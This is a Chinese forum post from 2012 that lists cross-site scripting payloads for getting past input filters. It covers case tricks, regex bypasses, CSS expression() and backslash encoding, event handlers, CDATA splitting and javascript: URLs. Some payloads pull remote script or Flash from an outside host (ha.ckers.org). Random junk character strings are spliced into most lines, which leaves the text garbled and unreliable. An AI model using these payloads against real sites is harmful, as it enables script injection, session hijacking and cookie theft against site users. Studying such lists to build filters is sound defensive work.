1. 改变字符大小写
0 h5 D8 H$ E" f5 R0 g2 b( w$ U& q" f2 u8 ^! K$ U- m* q
% S/ m" S/ X9 r" n3 F
$ E6 O* B/ c9 W R# E, f) K <sCript>alert(‘d’)</scRipT>
0 B7 n7 ]- A9 y/ ^
- e2 G7 J% m$ Z2 n2. 利用多加一些其它字符来规避Regular Expression的检查 Q6 ~$ R; L) _4 p& J& D6 W
$ h2 I( B4 H. p/ K
<<script>alert(‘c’)//<</script>
$ H b% t- d8 n
6 q ~( }6 _. S <SCRIPT a=">" SRC="t.js"></SCRIPT>
. N( ?6 L8 ?, C9 L
& D7 p& J; h* W: x, W& Q <SCRIPT =">" SRC="t.js"></SCRIPT>5 N! \7 J, {, I$ }3 c
4 X4 a* X& P t t% l9 r <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
% ~ t! i& W' Z* I$ e/ i
, y8 \/ f; c6 T/ Y7 \' Q4 I& C <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
5 L+ Q2 X3 O/ r2 c# ^
+ @: g2 {8 [$ H% G5 n <SCRIPT a=`>` SRC="t.js"></SCRIPT>
1 C$ u9 m* d, \1 y( O* R; r, ?6 S+ O0 G7 e& p8 ^
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>
1 W$ b$ u3 }8 t, V( Z6 V7 {4 L1 e: `' v3 _. c# }
3. 以其它扩展名取代.js
% B9 Z u& {6 E
- D' F0 o: V" M0 C <script src="bad.jpg"></script>5 z/ N, s8 Q0 p, j. r( O5 j
& [& ~% q$ V& H0 d9 l
4. 将Javascript写在CSS档里
0 h4 @6 q I1 q& b7 u
; L+ e' o8 F4 K7 R- ] <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
- H- T: X% U _0 A8 ]+ I1 |* x8 }7 \ a
example:" u. c6 M Z: [6 o1 g
, _" q$ I2 Z& X
body {9 \' U# y) Q1 N. q9 I) k3 U M+ F, m
% ~$ z: Q0 n8 ?: I" |
background-image: url(‘javascript:alert("XSS");’)5 l# e4 B/ p6 }$ d6 b- ~1 k
" _: i/ p5 N- D. |! n/ ?5 o# N }
! t/ P" n! E6 W. r
) Z4 `, n! L& @) r8 ^7 `5. 在script的tag里加入一些其它字符' C6 j. y* l! |9 N4 P
& G$ J! ^2 A1 L+ z7 l0 V4 Y <SCRIPT/SRC="t.js"></SCRIPT>
e% |: ^! y* g( I$ T) q/ a, Y6 w& Z6 b" Q2 r4 S( M2 I
<SCRIPT/anyword SRC="t.js"></SCRIPT>
4 `) N4 ?, H! n9 `( y
* E! {+ n% i8 R, S. E/ ~; K6. 使用tab或是new line来规避& k; v' o6 {( I7 P) u9 h4 G) q
6 S" T; Z0 S/ w) R; {
<img src="jav ascr ipt:alert(‘XSS3′)">
! N. M" |6 W2 y6 }: b: y% t- e8 x/ X% d4 b$ I v, w
<img src="jav ascr ipt:alert(‘XSS3′)">
4 V( f7 h2 D, Q3 r1 b+ q- n7 X- ?& ^! Q" N
<IMG SRC="jav ascript:alert(‘XSS’);">
5 c( ]; X& V& f# K1 r% _
# R* k9 o& N7 k4 H g$ y2 d -> tag
2 U6 r/ M6 i u- n3 o: L3 a# O: g$ G) f
-> new line
* `: C) k- a% D" o# X* L
$ Z' Y7 w! @; ?+ e! M# ]; Q7. 使用"\"来规避4 K! D( ]% P/ Y% Y
7 \# {1 r- G" }$ H <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
! T' I" \' H. ?; a1 f
, U# m! s9 v7 S3 o* M <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
; @: m! m/ K2 v: K9 W
) M3 ~! Q- b3 X w <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
( v! @# e) b' ^- w0 W" t* G
, R K2 s6 L, J' A- ` <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">% V1 X" `) K6 p9 {1 T8 U
; f3 [$ f5 N9 F" s+ B0 c- n4 J
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
: _* p; A! y3 I+ i5 S
" b; V5 h" Q3 d N8 {" n# h8. 使用Hex encode来规避(也可能会把";"拿掉)& F9 v* g% R0 ^& u( D W4 H) z
9 V" s: L' z% X: j1 V" {. U <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">( R8 ?% H. E- \, j# j
5 n8 [+ N' O7 D ~
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">. t0 \: v) W! Y" s" v1 Q$ g
0 N d) Z* P2 M- t" b
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">+ z/ h, u; i9 q$ X1 C1 w
- l! k) w3 n4 q3 R6 _, w 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
, a0 Y/ }; e" Q M! D5 R
; `; o: P. J5 j, g+ K9. script in HTML tag5 V. U0 L& r5 G! I9 U: c
$ Y) \! Q W/ K( L
<body onload=」alert(‘onload’)」>! c4 U$ |1 I @% K. K' J
% r \- c3 C8 x' L' b' w onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
, y. A2 u; D( N; J$ @$ @7 A# u/ K3 J3 U
10. 在swf里含有xss的code1 }$ X( u3 C. Z6 Z8 N
4 A& Z2 T% F3 F, J; L. b" X+ X <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
2 j0 l c" Y3 E( h9 m6 D- A+ Q @4 Q6 v9 j
11. 利用CDATA将xss的code拆开,再组合起来。% d; @4 d+ L' ~2 y( g
3 q8 O7 \ Y0 w
<XML ID=I><X><C>4 g" R3 r6 q& y$ x( w2 ^( C
$ o8 Y$ ^2 y5 |* H
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
2 ]+ K, ]# r/ U5 X& X& z5 g& N& L8 O% |4 G6 V" z1 ]& a
</C></X>
% f" [" a. q! f ]! Y, l8 w" c* s1 r5 {- N, \
</xml>
) L8 ]( y {5 ?, P$ S# Q i. N; |) V% `8 Y/ B0 X5 H- g& p
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>! {3 ^. j5 L0 X6 K
/ {" E6 c% ^9 r: A2 D2 v4 f9 V% {
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>4 q; m; C" B& a0 ?- S5 b
4 `% D' R1 j: R t2 M) k2 q <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>9 a7 P8 J. V8 t
2 v" i: p: p2 [8 G- M
12. 利用HTML+TIME。
& }% [' K$ {2 ]6 n9 t1 N5 ^) x2 M- _9 D( e* c r
<HTML><BODY>; t# r9 }1 K$ ~6 J- P1 U# c% [
1 i- C! ^6 S$ w( [, N4 `
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
/ v9 s# Q" s3 \ y7 R0 X+ p5 J
<?import namespace="t" implementation="#default#time2">
8 |8 d5 ~4 v% i. ~2 |9 J# [. w' b8 I+ d) j
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
+ X) }& q" X5 s9 K
+ P* e2 y& C! @9 z' B% J </BODY></HTML>, v( V) \3 x' e+ |
9 W) b3 m( V+ O" _* J: e" q13. 透过META写入Cookie。5 [( D- G* t7 A- O( L
& H0 U9 `& a' b <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
6 W' `8 A) S4 X7 u. l v$ L- X0 ]1 m I1 X+ q+ t C/ n# r2 c
14. javascript in src , href , url
1 S# N7 d! I. e, S4 g5 k
/ H( D1 H8 g, l8 y <IFRAME SRC=javascript:alert(’13′)></IFRAME>
n. S2 t+ }: j ]
, W5 k9 C! _3 } <img src="javascript:alert(‘XSS3′)">5 T$ a' v6 I# z9 A3 z
& ?8 m/ C; A4 r# I. K9 V7 z9 [1 A$ C
<IMG DYNSRC="javascript:alert(‘XSS20′)">
. I; f6 l2 e, P% J# k# t1 H% u$ P3 _
<IMG LOWSRC="javascript:alert(‘XSS21′)">8 c; p: t1 h& ^* L
# H9 l% y8 _1 T$ a/ {& n7 G* } <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
& t& y. ~( K4 v8 i0 b0 i7 w8 M6 k' q+ Z
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>8 C2 D+ t1 Q# ]5 S
9 i7 v. I/ E" _# l% O3 Y <TABLE BACKGROUND="javascript:alert(‘XSS29′)">. k' I1 T7 D& s7 K+ Y( O
6 U1 W2 u: h$ R+ |$ R8 D1 L" w
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">+ J9 i) r; x1 B, q
( N' o% w4 r3 s2 Z <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
- ?, p; g, z; U0 G+ }' A- D" y% m
</STYLE><A CLASS=XSS></A>
; ^8 [0 n$ f; n$ n$ i" y+ U0 z7 `8 V+ o" h/ P! Y
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>/ K3 d3 _2 A6 I
( f& |0 D P7 |/ x) ?2 y |
发表于 2012-12-31 09:59:28
收藏
支持
反对